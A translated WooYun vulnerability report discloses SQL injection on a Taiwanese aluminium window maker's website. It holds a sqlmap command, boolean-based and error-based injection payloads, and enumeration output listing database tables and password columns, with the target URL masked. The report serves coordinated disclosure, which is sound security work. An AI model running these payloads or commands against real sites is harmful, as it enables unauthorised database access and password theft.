
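Vulnerability summary

Bug ID: wooyun-2015-0158881

Title: SQL injection vulnerability on the main site of 元一實業股份有限公司 (large number of plaintext user passwords) (Taiwan region)

Vendor: 元一實業股份有限公司

Reported by: 路人甲

Submitted: 2015-12-07 11:07

Fixed: 2016-01-21 18:22

Published: 2016-01-21 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org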


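Vulnerability details

Disclosure status:

2015-12-07: Details reported to the vendor; awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and experts in related fields
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to trainee white hats
2016-01-21: Details disclosed to the public

Brief description:


元一實業 was founded in 1975 and is located in Tainan, Taiwan, with a factory area of about 6,000 ping. In its early years the company's business centered on aluminum extrusions for aluminum doors and windows; its own brand, 「元一鋁門窗」, has now existed for 38 years.
To expand its business and offer customers more services, the company set up a curtain wall division in 1981, providing professional curtain wall and aluminum panel wall fabrication and installation services, and in 2001 set up an aluminum-profile back-end processing department, providing sawing, machining (punching, milling, special-purpose machine processing), packaging and other services for aluminum products. The company's expertise and service are widely recognized: in 2007 it entered a technical cooperation with Japan's NABCO (Nabtesco) to manufacture the platform doors for the Taipei Metro Xinzhuang-Luzhou line, and in 2008 it moved into the solar industry, manufacturing aluminum products for photovoltaic panels. Four of the company's products (energy-saving airtight windows, energy-saving casement windows, energy-saving projected windows and energy-saving curtain walls) won the 2013 Taiwan Excellence award.
On quality, the company obtained CNS certification for building materials as early as 1981 and passed ISO international quality certification in 1995, establishing a quality assurance model for production and installation. In addition, the company's casement window (YE-661) and sliding window (YE-218) successively received the Ministry of the Interior's Green Building Material label, and in 2013 the company obtained OHSAS18001 and ISO14001 certification ahead of its peers, in order to build a better working environment and do its part for the environment.

Detailed description:

URL: http://**.**.**.**/news/?mode=data&id=126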

$ python sqlmap.py -u "http://**.**.**.**/news/?mode=data&id=126" -p id --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: yuangee
Table: imw_users
[28 entries]
Database: yuangee
Table: en_users
[16 entries]
Database: yuangee
Table: jp_users
[15 entries]

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=data&id=126 AND 9162=9162
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: mode=data&id=126 AND (SELECT 2259 FROM(SELECT COUNT(*),CONCAT(0x7170707671,(SELECT (ELT(2259=2259,1))),0x7176717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0
current user: 'yuangee@localhost'
current user is DBA: False
database management system users [1]:
[*] 'yuangee'@'localhost'
Database: yuangee
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| imw_statistics_agent | 261382 |
| imw_statistics_visitors | 169170 |
| en_statistics_agent | 109372 |
| jp_statistics_agent | 109118 |
| imw_statistics_ad | 45479 |
| en_statistics_visitors | 35679 |
| ip2nation | 33903 |
| imw_statistics_functions | 22276 |
| jp_statistics_visitors | 21010 |
| en_statistics_functions | 19126 |
| jp_statistics_functions | 17556 |
| en_statistics_ad | 6928 |
| jp_statistics_ad | 5788 |
| imw_files | 769 |
| imw_files_link | 769 |
| imw_statistics_login_history | 693 |
| jp_files | 689 |
| jp_files_link | 689 |
| en_files | 687 |
| en_files_link | 687 |
| en_statistics_login_history | 417 |
| jp_statistics_login_history | 416 |
| ip2nationcountries | 246 |
| imw_content | 176 |
| en_content | 174 |
| jp_content | 173 |
| en_help | 141 |
| imw_help | 141 |
| jp_help | 141 |
| imw_news | 99 |
| en_gallery_album | 85 |
| imw_gallery_album | 85 |
| jp_gallery_album | 85 |
| en_system_setting | 80 |
| imw_system_setting | 80 |
| jp_system_setting | 80 |
| jp_news | 74 |
| en_news | 73 |
| imw_products | 71 |
| imw_products_link | 71 |
| imw_products_spec | 71 |
| en_products | 57 |
| en_products_link | 57 |
| en_products_spec | 57 |
| jp_products | 57 |
| jp_products_link | 57 |
| jp_products_spec | 57 |
| en_searchbot | 51 |
| imw_searchbot | 51 |
| jp_searchbot | 51 |
| imw_products_type | 49 |
| imw_users | 28 |
| imw_download | 25 |
| en_download | 21 |
| jp_download | 21 |
| en_users | 16 |
| jp_users | 15 |
| imw_contact_us | 14 |
| imw_sessions | 11 |
| imw_gallery_album_charts | 10 |
| en_web_content | 9 |
| imw_web_content | 9 |
| jp_web_content | 9 |
| en_about_us | 8 |
| imw_about_us | 8 |
| jp_about_us | 8 |
| en_gallery_type | 7 |
| en_products_type | 7 |
| imw_gallery_type | 7 |
| jp_gallery_type | 7 |
| jp_products_type | 7 |
| imw_download_type | 5 |
| en_download_type | 4 |
| en_news_type | 4 |
| imw_news_type | 4 |
| jp_download_type | 4 |
| jp_news_type | 4 |
| jp_sessions | 4 |
| en_sessions | 3 |
| en_users_type | 3 |
| imw_users_type | 3 |
| jp_contact_us | 3 |
| jp_users_type | 3 |
| en_ad | 2 |
| en_ad_link | 2 |
| en_contact_us | 2 |
| imw_ad | 2 |
| imw_ad_link | 2 |
| jp_ad | 2 |
| jp_ad_link | 2 |
| en_ad_type | 1 |
| en_themes | 1 |
| imw_ad_type | 1 |
| imw_contact_us_send_log | 1 |
| imw_themes | 1 |
| jp_ad_type | 1 |
| jp_themes | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1356 |
| TABLES | 148 |
| STATISTICS | 144 |
| KEY_COLUMN_USAGE | 130 |
| TABLE_CONSTRAINTS | 127 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 14 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: yuangee
Table: imw_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: yuangee
Table: en_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+
Database: yuangee
Table: jp_users
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(100) |
+----------+--------------+

Fix:

Deploy a WAF.

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-08 07:38

Vendor reply:

Thank you for the report

Latest status:

None